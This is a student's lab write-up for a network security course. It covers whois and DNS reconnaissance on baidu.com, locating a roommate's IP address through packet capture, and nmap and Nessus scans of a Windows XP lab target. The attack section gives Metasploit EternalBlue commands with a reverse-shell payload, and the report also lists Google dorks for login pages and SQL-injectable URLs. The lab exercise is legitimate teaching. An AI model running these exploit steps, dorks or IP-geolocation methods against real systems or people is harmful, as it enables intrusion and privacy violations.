20222422 2024-2025-1 《網路與系統攻防技術》實驗五實驗報告

某热心市民發表於2024-11-30

一、實驗內容

(1)從www.besti.edu.cn、baidu.com、sina.com.cn中選擇一個DNS域名進行查詢,獲取如下資訊:

DNS註冊人及聯絡方式

該域名對應IP地址

IP地址註冊人及聯絡方式

IP地址所在國家、城市和具體地理位置

PS:使用whois、dig、nslookup、traceroute、以及各類線上和離線工具進行蒐集資訊(要求必須用WHOIS、dig、nslookup、traceroute、tracert以及線上工具)

(2)嘗試獲取BBS、論壇、QQ、MSN中某一好友的IP地址,並查詢獲取該好友所在的具體地理位置。

(3)使用nmap開源軟體對靶機環境進行掃描,回答以下問題並給出操作命令。

靶機IP地址是否活躍

靶機開放了哪些TCP和UDP埠

靶機安裝了什麼作業系統,版本是多少

靶機上安裝了哪些服務

(4)使用Nessus開源軟體對靶機環境進行掃描,回答以下問題並給出操作命令。

靶機上開放了哪些埠

靶機各個埠上網路服務存在哪些安全漏洞

你認為如何攻陷靶機環境,以獲得系統訪問權

(5)透過搜尋引擎搜尋自己在網上的足跡,並確認自己是否有隱私和資訊洩漏問題。並練習使用Google hack蒐集技能完成搜尋(至少10種搜尋方法)

二、實驗過程

(一)從www.besti.edu.cn、baidu.com、sina.com.cn中選擇一個DNS域名進行查詢,獲取資訊

選擇的DNS域名:baidu.com

1、使用whois命令

whois baidu.com

image

image

獲取資訊如下:
DNS註冊人:MarkMonitor Inc
DNS註冊人聯絡方式:
(1)郵箱:abusecomplaints@markmonitor.com
(2)電話:+1.2086851750
IP地址所在國家:CN
城市:Beijing
具體地理位置:Beijing Baidu Netcom Science Technology Co., Ltd

2、使用nslookup命令

nslookup baidu.com

image

獲取ip地址如下:
(1)39.156.66.10
(2)110.242.68.66

(1)使用whoise查詢39.156.66.10
whois 39.156.66.10

image

獲得資訊:
IP註冊人:haijun li
郵箱:hostmaster@chinamobile.com
地址: 29,Jinrong Ave, Xicheng district,beijing,100032
電話: +86 1052686688
還有其他資訊

(2)使用whoise查詢110.242.68.66
whois 110.242.68.66

image

獲得資訊:
IP註冊人:Kong Lingfei
郵箱:konglf5@chinaunicom.cn
地址: 45, Guang An Street, Shi Jiazhuang City, HeBei Provin
電話: +86-311-86681601
還有其他資訊

3、使用dig命令

dig baidu.com

image

可以看到同樣獲取了ip地址等資訊,與之前獲取的一致

4、使用traceroute命令

traceroute baidu.com

image

發現無法看到資料包到該網站所經過的路由的路徑

5、使用tracert命令

該命令實在windows下使用的
tracert baidu.com

image

發現在抵達110.242.68.66之前經過了如上圖的眾多路由節點

6、使用線上網站查詢

網址:https://uutool.cn/ip/

(1)查詢39.156.66.10

image

(2)查詢110.242.68.66
image

發現除了國家等地址,還有更加具體的經緯度資訊和網際網路服務提供商資訊等

(二)嘗試獲取BBS、論壇、QQ、MSN中某一好友的IP地址,並查詢獲取該好友所在的具體地理位置。

(1)和舍友打微信電話並開啟抓包

image

ip查詢結果如下:

image

ip屬地為北京市豐臺區,與舍友位置一致

(三)使用nmap開源軟體對靶機環境進行掃描,回答以下問題並給出操作命令

靶機:winxp
靶機ip:192.168.198.148

1、ping掃描

nmap -sn 192.168.198.0/24

image

透過掃描結果可知,靶機線上

2、靶機開放了哪些TCP和UDP埠

透過命令nmap -sT -sU -p- 192.168.198.148來對靶機TCP和UDP埠進行掃描

image

開放的埠有:
TCP:135,139,445
UDP:123,137,138,445,500,1027,1900,4500

3、靶機安裝了什麼作業系統,版本是多少

nmap -O 192.168.198.148

image

可以看出作業系統是Microsoft Windows XP SP2 或者SP3

4、靶機上安裝了哪些服務

nmap -sV 192.168.198.148

image

可以看出靶機安裝了msrpc(微軟遠端過程呼叫)、netbios-ssn(網路基本輸入輸出系統的會話服務)、microsoft-ds(微軟網路目錄服務)。

(四)使用Nessus開源軟體對靶機環境進行掃描,回答以下問題並給出操作命令

1、下載nessus開源軟體,過程參考:https://blog.csdn.net/m0_52985087/article/details/135170187
2、靶機上開放了哪些埠

靶機:winxp
靶機ip:192.168.198.148

點選右上角的new scan,選擇host discovery

image

設定引數:

image

點選launch,開始掃描:

image

掃描結果如下:

image

發現開放了的埠有135,139,445

3、靶機各個埠上網路服務存在哪些安全漏洞

建立new scan,選擇advanced scan,並設定引數:

image

掃描結果如下:

image

image

image

image

可以看出445埠的SMB/RPC服務存在MS09-001、MS08-067、MS17-010漏洞。

4、你認為如何攻陷靶機環境,以獲得系統訪問權

(1)MS09-001:

攻擊者可以利用該漏洞,透過傳送特製的SMB請求,在目標主機上執行任意程式碼。成功利用該漏洞後,攻擊者可以獲取到目標系統的完全控制許可權。

(2)MS08-067:

攻擊者可以透過傳送精心構造的SMB請求,導致遠端程式碼執行。該漏洞的利用可以讓攻擊者在目標系統上執行惡意程式碼,並可能進一步滲透網路。

(3)MS17-010:

該漏洞允許攻擊者透過精心構造的SMB請求,傳送惡意資料包到目標計算機,進而遠端執行程式碼。攻擊者可以利用該漏洞完全控制受害者系統。

(4)攻擊步驟:

掃描目標主機的445埠,確認SMB服務是否開啟。
nmap -p 445 --script smb-os-fingerprint <target_ip>

使用工具如Metasploit,檢查目標系統是否易受MS09-001、MS08-067或MS17-010漏洞的攻擊。
例如,使用Metasploit的auxiliary/scanner/smb/smb_ms17_010模組來檢查MS17-010漏洞:
msfconsole

use auxiliary/scanner/smb/smb_ms17_010

set RHOSTS <target_ip>

run

如果目標存在漏洞,可以使用Metasploit等工具嘗試利用該漏洞進行遠端程式碼執行。例如,使用Metasploit的exploit/windows/smb/ms17_010_eternalblue模組來利用MS17-010漏洞:
msfconsole

use exploit/windows/smb/ms17_010_eternalblue

set RHOSTS <target_ip>

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST <your_ip>

run

(五)搜尋測試

1、透過搜尋引擎搜尋自己在網上的足跡,並確認自己是否有隱私和資訊洩漏問題

搜尋姓名:

image

發現都是無關我的資訊,沒有洩露

搜尋學號:

image

發現有之前寫的部落格園實驗報告資訊,沒有訊息洩露

搜尋電話號碼:

image

發現只有號碼段所在地區,未洩露資訊

搜尋身份證號:

image

發現也沒有洩露訊息

2、練習使用Google hack蒐集技能完成搜尋(至少10種搜尋方法)

(1)搜尋網頁標題
intitle: login

搜尋標題中包含“login”的頁面

image

(2)搜尋特定的URL結構
inurl:"login" "admin"

查詢URL中包含“login”和“admin”的頁面

image

(3)搜尋特定網站的內容
site:baidu.com "username"

查詢baidu.com網站上包含“username”字樣的頁面

image

(4) 搜尋特定子域名
site:baidu.com -www

搜尋會列出baidu.com下所有的子域名,排除www子域

image

(5)查詢密碼保護頁面
inurl:"password"

該搜尋可以幫助你找到登入或密碼驗證頁面,可能會暴露某些弱密碼的提示。

image

(6)搜尋特定檔案型別
filetype:pdf "批發"

該搜尋可以幫助你找到包含“批發”字樣的PDF檔案。

image

(7)查詢可能包含sql注入的網址
inurl: .php?id=

image

(8)查詢頁面內容
intext: admin

查詢包含“admin”這個詞的頁面內容

image

(9)查詢相似頁面
related:https://www.besti.edu.cn/

查詢與https://www.besti.edu.cn/ 佈局相似的頁面

image

(10)檢視指定地方的天氣
weather:beijing

檢視北京的天氣

image

三、問題及解決方案

問題一:在安裝nessus的時候一開始在kali上安裝,發現註冊的時候總是不成功

問題一解決:發現是kali硬碟空間不足了,有兩種解決方案:一種是擴容kali空間,一種是在windows下使用nessus,我選擇的是後者

問題二:使用tracert命令在kali執行時發現報錯

問題二解決:發現tracert是windows下的命令,換windows的cmd下執行得以解決

四、學習感悟、思考等

本次實驗讓我深入瞭解了網路安全領域中的資訊收集、漏洞掃描和滲透測試的基本方法與技巧。在實驗過程中,我首先學習使用了whois、dig和nslookup等工具。使用nmap和Nessus對靶機環境的掃描讓我實際感受到漏洞掃描的重要性。透過nmap,我成功識別了靶機的活躍性、開放埠、作業系統及安裝服務;而透過Nessus,我發現了靶機上的潛在安全漏洞,這為滲透測試和防護措施提供了有力的依據。實驗中也讓我認識到,滲透測試不僅僅是技術問題,更需要對系統的全面理解和風險評估。透過Google Hacking技巧的練習,我學習到了如何使用特定的搜尋語法來發現網路中的潛在隱私洩漏和資訊暴露。這種技能對於資訊收集和漏洞挖掘具有重要意義,但同樣要注意合法使用,避免侵犯他人隱私。
本次實驗不僅讓我掌握了網路安全的工具和技術,還加強了對資訊保安倫理的認識。

參考資料

  • [《CSDN在windows下安裝nessus教程》] https://blog.csdn.net/m0_52985087/article/details/135170187

相關文章